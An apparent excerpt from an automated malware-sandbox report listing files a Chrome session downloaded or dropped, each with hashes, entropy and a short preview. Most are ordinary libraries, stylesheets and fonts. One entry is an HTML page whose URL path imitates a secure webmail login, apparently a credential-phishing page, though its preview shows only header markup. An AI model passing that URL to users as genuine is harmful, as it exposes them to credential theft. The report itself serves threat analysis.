                                                                                                                                          File Type:ASCII text, with very long lines (383), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):383
                                                                                                                                          Entropy (8bit):4.833568671779538
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:YgGMLGgJfGML8LAFvCfpPdqJFDE2W0VERGq+GML2K/BR1oBMmGMLtGMLNOioL7GY:YWtDQLAcGFxW0qRGqQvJR1cTJBOL/TIc
                                                                                                                                          MD5:DAD2D1293E0ED2E07042EA5CF93C0AD5
                                                                                                                                          SHA1:610A8CB5EB05005B92F4F3D46FE82FBD76B79A54
                                                                                                                                          SHA-256:998FD16EE7AB305689B956C89BDA4CB062754773C4D6D7D28E9674432480EEC7
                                                                                                                                          SHA-512:C69E54F49019015C28B20A7F730F73C1A7BD3026107D8C626FCB4518596431412193AD66EE77BB0FB5146868DA9099DED5CDFF9C80423361D1D863E691C1F420
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/multilingual-press/assets/css/frontend.min.css?ver=1566305675
                                                                                                                                          Preview:.mlp-quicklinks.bl:after,.mlp-quicklinks.br:after{content:'';display:table;clear:both}.mlp-language-box ul li{display:inline;margin:0 5px 0 0;list-style-type:none}.mlp-quicklinks{max-width:10em;padding:10px}.mlp-quicklinks.bl,.mlp-quicklinks.tl{float:left;margin-right:20px}.mlp-quicklinks.br,.mlp-quicklinks.tr{float:right;margin-left:20px}.mlp-quicklinks-form input{font-size:.9em}
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):365359
                                                                                                                                          Entropy (8bit):4.912193389889079
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:eTNtY99BSA8ZVGqE0mxQyp4mgWqIVIKCdfaxWEUDrJRXJx8XezTE4k3WB8TmQOHv:FGpf/N0nFyCFPM6LkoXnWOBmr
                                                                                                                                          MD5:85EB94D8967CF16ED9F0A02871C3CCB6
                                                                                                                                          SHA1:762EF65FC40786F18AFB080C684CA9610B673574
                                                                                                                                          SHA-256:BB6575ED5A21F404F85267A305FD4BA09A588AF0BB87C0E13F8189016C3ABD29
                                                                                                                                          SHA-512:92816C8A3739077F3BB2A4CAF08143831F06A6FC12DBFA4E992AA2D67276EC90896769C8604F08A8B14C1FA75A76FBA8109BA2CD2886854344504D96A5292662
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html
                                                                                                                                          Preview:..<html lang="...">....<head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. Styles, Javascript and other things go here -->.. <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>.. <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>.. <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=".. crossorigin="anonymous"></script>.. Required meta tags -->.. <meta charset="utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. <link rel="icon" id="favicon" type="image/png" sizes="192x192".. href="https://www.google.com/s2/favicons?domain=?v=BUILD_HASH">.... Bootstrap CSS -->.. <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity=
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):89684
                                                                                                                                          Entropy (8bit):5.290619806745655
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:SjjxXUHJnxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBvUsuy8WnKdXwhLQv1:SdeIygP3fulzcsz8jlvaDioQ47GKK
                                                                                                                                          MD5:17738318D61D394F1DE8890D589AFAEC
                                                                                                                                          SHA1:F6D0C4DC1399CF02D53F5753AD46573A8BBC2AC3
                                                                                                                                          SHA-256:CC7403BAB52ED166E24EA9324241045AF370BE482F5B594468F4A6AC6E7E7981
                                                                                                                                          SHA-512:242FFC23ED47553221460F601CB56C507E52A163E46AB9C89C3E39AB933A54FD326B2134D3E831DF7F32614329775A0C600F63BF54F4C5B8994F090C5FBA156F
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):751172
                                                                                                                                          Entropy (8bit):5.236356670525082
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:1U/hMWDvHsoz9kY3gzIWQYnb52DiiYlnPyAdNBiGedN9C/RumB6A:UDfBvQzIW32+iINAGIN9C/R9
                                                                                                                                          MD5:7BDE7C65C3492208C4FB67507C86B2B1
                                                                                                                                          SHA1:F96DC90842ADACAA08E9F95C0EDCC9D366D56B6D
                                                                                                                                          SHA-256:41982F37DCB6389966F16C8393176FFA87A2E4ECDA7315A05683A2A558AC0A10
                                                                                                                                          SHA-512:35ED0901D9490D95766850D4D9BF04A337D65E469C7287D50623B114A1A63246B80731B233002719AF1CAEA2EEE2307B7F982D8C69B9935B0EDCC9FA91BD0504
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:!function(t){var e=window.am4internal_webpackJsonp;window.am4internal_webpackJsonp=function(i,o,s){for(var a,u,l,h=0,c=[];h<i.length;h++)u=i[h],n[u]&&c.push(n[u][0]),n[u]=0;for(a in o)Object.prototype.hasOwnProperty.call(o,a)&&(t[a]=o[a]);for(e&&e(i,o,s);c.length;)c.shift()();if(s)for(h=0;h<s.length;h++)l=r(r.s=s[h]);return l};var i={},n={a74a:0};function r(e){if(i[e])return i[e].exports;var n=i[e]={i:e,l:!1,exports:{}};return t[e].call(n.exports,n,n.exports,r),n.l=!0,n.exports}r.e=function(t){var e=n[t];if(0===e)return new Promise(function(t){t()});if(e)return e[2];var i=new Promise(function(i,r){e=n[t]=[i,r]});e[2]=i;var o=document.getElementsByTagName("head")[0],s=document.createElement("script");s.type="text/javascript",s.charset="utf-8",s.async=!0,s.timeout=12e4,r.nc&&s.setAttribute("nonce",r.nc),s.src=r.p+"deps/"+({"0471":"canvg","076f":"pdfmake",bf3e:"xlsx"}[t]||t)+".js";var a=setTimeout(u,12e4);function u(){s.onerror=s.onload=null,clearTimeout(a);var e=n[t];0!==e&&(e&&e[1](new
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 42 x 245, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):13065
                                                                                                                                          Entropy (8bit):7.977671396670077
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:bqRkXEI9QIaVGVtgPw5hJaqOQ1SFQajvxjW8BrLX1U/siCMG5OrpUtu9kwKL:bqRaEsuap5OQ161W8B3FUUEWOrpA/wKL
                                                                                                                                          MD5:C6E5EF7EC9288D17D3502A408F07D9B4
                                                                                                                                          SHA1:EB72BB4BE2F77F90DA7F9FAE06D623C9228ECE78
                                                                                                                                          SHA-256:A1825C2A3C207A1895C325BABEF34CEBC948EBEF7D7FEF1462456F48B730EE11
                                                                                                                                          SHA-512:4799FA3AA616CF6BF1CA26FBA8DA706E40F8F53144168787C60CCF91DF47679F2904825AFBD777430ACC74DFBB711F85FF6A528234F0D0CF7152BFDE45953278
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:.PNG........IHDR...*.........&.g.....gAMA......a...2.IDATx..].......H......B9..T.4a.s.a.3.9|6......f6.os.cl.(gF9VHR).H($....~..y...?.....>\..<......_..0..Q4%UKve....=...l..1#.,...Z5...hkZ.Z..].D...6#..I 6GMRj##..R.i!..b@.+t.*.....Viw...u.3Z..D....Sd..v..'%.T.+.2'..... .o&/;.>......r.j.u.L. ..@B'(uo,Po...x..m........-^<.....&;~..L...&..@...qPr..aLn..+....xzt....2.....@..g0*......:..E9......T`.....~.D.w..V...#[%`.......l.. ....-..c)!..X..`.x.._l;..e........fg....[.Z...Z...]...x...L.....>........>...GBI.NL..3:..|.....e.W.a ..@d(..Gh.9.n.0.N....r....2)".J.../...KY....Ehk.j.Qy......27.i.`....&....i.....mnw<..}..ivY\E=%..=....Ju...b.Ri'..tNy....6....M.^....%.^.5..O..Af.a.e.r.b.-....S-7.......l..j.WX..?.7..:.S...^..>..YZ\.c.w..I.;%..~,DW.,"..3._....d.>^`..t..._N...U..........6.jFkE.....'$u...>c.......3.O........P./=+y.K.....5[k..;..k...|..P...@...t...=..j?..{..g..#.NDz.+..V.....DH1.....u.f.k`AI[.M......o.E..mS.*...1.9l.d-.$aJ.Q.*....:K.F..ce..a`.y.-...
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (32065)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):85578
                                                                                                                                          Entropy (8bit):5.366055229017455
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                                                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                                                                                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):245638
                                                                                                                                          Entropy (8bit):4.398782976205756
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:kRZTP/EhnBUpGgbrIU1PbAfJhaX2nHe3puA2NwY4PsGEGy+SQBWI6FkRXk5+NBH5:FUjTg8meeQ9LVpjCA
                                                                                                                                          MD5:19ED28FA527C4664A43E357EF6426CAE
                                                                                                                                          SHA1:A48E230702E8007EF00DC356F5AEFD96EF62ABB8
                                                                                                                                          SHA-256:29463A97E005CE5C927683D9EEBCAA2C496D99B1E29F95857418E0DAB51A5E80
                                                                                                                                          SHA-512:15BDC9EAB9428D25BBCBC000634552BDBC39002927B9E34B97CDC1A2879DD2B17C87B7CDB8C41597D06BF51A44D7EDC06FC40DF4A0250EFCECBCFC10E67008B2
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/themes/tentamus/assets/scripts/amcharts4/worldLow.js
                                                                                                                                          Preview:am4internal_webpackJsonp(["fcaa"],{ATzU:function(e,t,o){"use strict";Object.defineProperty(t,"__esModule",{value:!0});window.am4geodata_worldLow={type:"FeatureCollection",features:[{type:"Feature",geometry:{type:"Polygon",coordinates:[[[179.2223,-8.554],[179.2023,-8.4653],[179.2312,-8.5048],[179.2223,-8.554]]]},properties:{name:"Tuvalu",id:"TV"},id:"TV"},{type:"Feature",geometry:{type:"Polygon",coordinates:[[[3.4624,-54.4471],[3.3461,-54.4511],[3.3669,-54.3997],[3.4814,-54.4001],[3.4624,-54.4471]]]},properties:{name:"Bouvet Island",id:"BV"},id:"BV"},{type:"Feature",geometry:{type:"Polygon",coordinates:[[[-5.3345,36.1623],[-5.3382,36.1122],[-5.3562,36.1264],[-5.3551,36.1455],[-5.3345,36.1623]]]},properties:{name:"Gibraltar",id:"GI"},id:"GI"},{type:"Feature",geometry:{type:"Polygon",coordinates:[[[47.3029,-11.5752],[47.282,-11.5747],[47.2789,-11.5574],[47.2971,-11.5543],[47.3029,-11.5752]]]},properties:{name:"Glorioso Islands",id:"GO"},id:"GO"},{type:"Feature",geometry:{type:"Polygon",co
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 14736, version 1.0
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):14736
                                                                                                                                          Entropy (8bit):7.985219311826649
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:UC65N114xWY+UuSfo0p7tVuufkYsC1twU4:V6T11XY+qom7tVPfOC1KU4
                                                                                                                                          MD5:C27A2E28B3A242FA8FF8F98B497E77AB
                                                                                                                                          SHA1:82AA3D68BB1A3922CE860FC07336EB2AC77CEB6C
                                                                                                                                          SHA-256:60CDFF1621CD9803C61B2C7D010ADCB8094F41FCAB2DA420F99DEAD9C097395F
                                                                                                                                          SHA-512:EEFC164F73BAEBD2B29E413956375091D588D17E4B6FC52E46C25082C3FC868C04EAC5B057B369688707DB9809A2A4FEA13D374AD3FAD29170077A6B9D45CA79
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/themes/tentamus/assets/fonts/barlow400.woff2
                                                                                                                                          Preview:wOF2......9...........96.............................f..P.`..r........7.....6.$..4. ..J..M..m..U... ..+.HD.q..m\>"%'Q......A....C...B.&Q..#.Q{OO....p2....C..SBQ....T.F...Pf.6I8......+.....N...C.....~G].J.Jv?./.%h...Od">...y.....U.JRO.4I.....mS.jTh.....E....u..Fa...f.....c.D....^.E%>..9@.....U.aojD.w.ln-..{Et..s...=M..f...SH..^J...hN.....`..........`..`.....q.]....(iu....'....._.....K....A.F..s............p._.!.b...J....bY..u.J.Ds;.g!-...4....b0....!x....-...75m...2..U....s.E.;..y\9W..........@,..,.0Z.A.$(]...AY.H...yt.9..<..P1..N)W.W.O..\.ve.m..."H$....6}..O..d.j.t.FFIJ...U..FGA.......`....m.-^....P.LD.ipw.v+.r.REB.q[...ly|.....f.gq..0j.b$x?..w?.....1X...t.......@....Q..x..Br..#.......E.(A(....W.B.9...F<...Hg.A:.........p.m....A.}....o.C.....@ .c@9.uP.W...o .=00.h...+..".C.L..$H.@....Q...a........x.x,...0..<..tn~....|.D..D.B........n.}s.W.D.......Un..k..gv.....@@0.o.../..,.3{......v..O|.s...)...-J..<<1..$".CF...R.5.h..L&f,Vyh.\.x. .*E)S......O.
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (32065)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):85578
                                                                                                                                          Entropy (8bit):5.366055229017455
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                                                                                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                                                                                                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                                                                                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                                                                                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):271751
                                                                                                                                          Entropy (8bit):5.0685414131801165
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:+tah6/K+TCtlMhTze/RZcYmDizK8dB7alFys/WL/umH4N0IPfKu5AA11vrIY:9pZcYmDcHwFygmY1PfjAA1Br3
                                                                                                                                          MD5:6A07DA9FAE934BAF3F749E876BBFDD96
                                                                                                                                          SHA1:46A436EBA01C79ACDB225757ED80BF54BAD6416B
                                                                                                                                          SHA-256:D8AA24ECC6CECB1A60515BC093F1C9DA38A0392612D9AB8AE0F7F36E6EEE1FAD
                                                                                                                                          SHA-512:E525248B09A6FB4022244682892E67BBF64A3E875EB889DB43B0A24AB4A75077B5D5D26943CA382750D4FEBC3883193F3BE581A4660065B6FC7B5EC20C4A044B
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://code.jquery.com/jquery-3.3.1.js
                                                                                                                                          Preview:/*!. * jQuery JavaScript Library v3.3.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2018-01-20T17:24Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (50758)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):51039
                                                                                                                                          Entropy (8bit):5.247253437401007
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                                                                                                          MD5:67176C242E1BDC20603C878DEE836DF3
                                                                                                                                          SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                                                                                          SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                                                                                                          SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (21108)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):21185
                                                                                                                                          Entropy (8bit):5.34546573306397
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:3PhVIXQ2G2XAQyqVxRQ5giCCMLtA4Tn5h5/F6l8aZwHwztLCpz3sp:3PSIt8zn5h5t1qkOLCZsp
                                                                                                                                          MD5:9229EB55B91AE423F2B23B48A19F5B54
                                                                                                                                          SHA1:7E28AA94370FCAF19E96ADF603C0E5BBA7D01BD1
                                                                                                                                          SHA-256:E5F479B4FF8195DAF42092E15A95D6E04BB34BEBCB2C625A177FEADBD34B1AB0
                                                                                                                                          SHA-512:EAB5A8A4244FF0EB764CD70D278ED4F34071D400D177A937DEB3A2AA7D84FE81A43220EC11E1A378393B68F2E185E97380B75392D5A5C638D8D37A4DAC1AC84C
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/magnific-popup.min.js?ver=1.8.2
                                                                                                                                          Preview:/*! Magnific Popup v1.0.1 | http://dimsemenov.com/plugins/magnific-popup/ */.!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):window.jQuery||window.Zepto)}(function(a){var b,c,d,e,f,g,h="Close",i="BeforeClose",j="AfterClose",k="BeforeAppend",l="MarkupParse",m="Open",n="Change",o="mfp",p="."+o,q="mfp-ready",r="mfp-removing",s="mfp-prevent-close",t=function(){},u=!!window.jQuery,v=a(window),w=function(a,c){b.ev.on(o+a+p,c)},x=function(b,c,d,e){var f=document.createElement("div");return f.className="mfp-"+b,d&&(f.innerHTML=d),e?c&&c.appendChild(f):(f=a(f),c&&f.appendTo(c)),f},y=function(c,d){b.ev.triggerHandler(o+c,d),b.st.callbacks&&(c=c.charAt(0).toLowerCase()+c.slice(1),b.st.callbacks[c]&&b.st.callbacks[c].apply(b,a.isArray(d)?d:[d]))},z=function(c){return c===g&&b.currTemplate.closeBtn||(b.currTemplate.closeBtn=a(b.st.closeMarkup.replace("%title%",b.st.tClose)),g=c),b.currTemplate.closeBtn},A=function(){a.magnificPopu
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:C source, ASCII text, with very long lines (8700), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):8700
                                                                                                                                          Entropy (8bit):4.901679221068419
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:c7FZY7QB0zRHEFjedGgSrWN06CwuEUKj4vZPTxJpEMfHBE6J0/Pn07:uYNzRHIJgSaN06lj4BPl7E6O6JCk
                                                                                                                                          MD5:38F95416D5F7349B65699F64E6A587FD
                                                                                                                                          SHA1:2CA6F6F77481C3CDBCAACFC61A56C24F3C933ADE
                                                                                                                                          SHA-256:08756C47213D461BAA3B01F42448A76D11F524470C7A34F9018733889BD4F49C
                                                                                                                                          SHA-512:E855AB926916CC3A9AEF67E6BCAC01056180650710804624452F2D2ACB7CE5CE563FBDC5146D51FFE6607FBCDFF8D806765D4FE14C6316AE559BB0C6281EDAFA
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.5.4
                                                                                                                                          Preview:!function(){if("function"==typeof window.CustomEvent)return!1;function e(e,t){t=t||{bubbles:!1,cancelable:!1,detail:void 0};var n=document.createEvent("CustomEvent");return n.initCustomEvent(e,t.bubbles,t.cancelable,t.detail),n}e.prototype=window.Event.prototype,window.CustomEvent=e}(),function(){var e=function(e){return RegExp("(^| )"+e+"( |$)")},t=function(e,t,n){for(var i=0;i<e.length;i++)t.call(n,e[i])};function n(e){this.element=e}n.prototype={add:function(){t(arguments,function(e){this.contains(e)||(this.element.className+=this.element.className.length>0?" "+e:e)},this)},remove:function(){t(arguments,function(t){this.element.className=this.element.className.replace(e(t),"")},this)},toggle:function(e){return this.contains(e)?(this.remove(e),!1):(this.add(e),!0)},contains:function(t){return e(t).test(this.element.className)},replace:function(e,t){this.remove(e),this.add(t)}},"classList"in Element.prototype||Object.defineProperty(Element.prototype,"classList",{get:function(){return
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (55998), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):55998
                                                                                                                                          Entropy (8bit):4.899506651309782
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:MmWv/AOMdHGKdZh8cYJ7i3RXZXZXsMsEhVxJWgbd9rd9td9bd9GPezXV:MmEMdHdlRR7MPe7V
                                                                                                                                          MD5:4B8F0B14CEC262C21370D44C242D9557
                                                                                                                                          SHA1:E7C0F1AD5A3918D9C1579F666D02623466900E3E
                                                                                                                                          SHA-256:2DBA10109FD33D4A4080F2D8E29BE04A9954030D3F637249D41D51D8BEAD2EEF
                                                                                                                                          SHA-512:3597E73577451CD24DC5F8636925D7BEE52889757B33703778E0EA30D3848BBBA0232C9C1757A2A52FE419677F3465CB5A12C78FC8451CF15A01F8145051ABC0
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/uploads/sites/71/tailor/css/frontend.min.css?ver=1.8.2
                                                                                                                                          Preview:html{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}*,*::before,*::after{-webkit-box-sizing:inherit;-moz-box-sizing:inherit;box-sizing:inherit}.tailor-ui .tailor-author{padding:0;margin-bottom:1rem;font-size:1em;color:inherit;background-color:transparent;border:1px solid #efefef;border-radius:2px;box-shadow:none;overflow:hidden}.tailor-ui .tailor-author__wrap{padding:0 2em 1em}.tailor-ui .tailor-author__header{padding-top:1rem;text-align:center}.tailor-ui .tailor-author__avatar{margin:0;width:100px;border-radius:50%;border:5px solid #fff}.tailor-ui .tailor-author__name{margin:0 0 1rem;font-size:1.25em;text-align:center}.tailor-ui .tailor-author__social-links{padding:0;margin:0 0 0.5rem;list-style:none;text-align:center}.tailor-ui .tailor-author__social-links li{display:inline-block;margin-right:0.5rem}.tailor-ui .tailor-author__social-links a{text-decoration:none}.tailor-ui .tailor-author.has-header-image .tailor-author__header{position:relative;margin-b
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (14278)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):14308
                                                                                                                                          Entropy (8bit):5.219792841585514
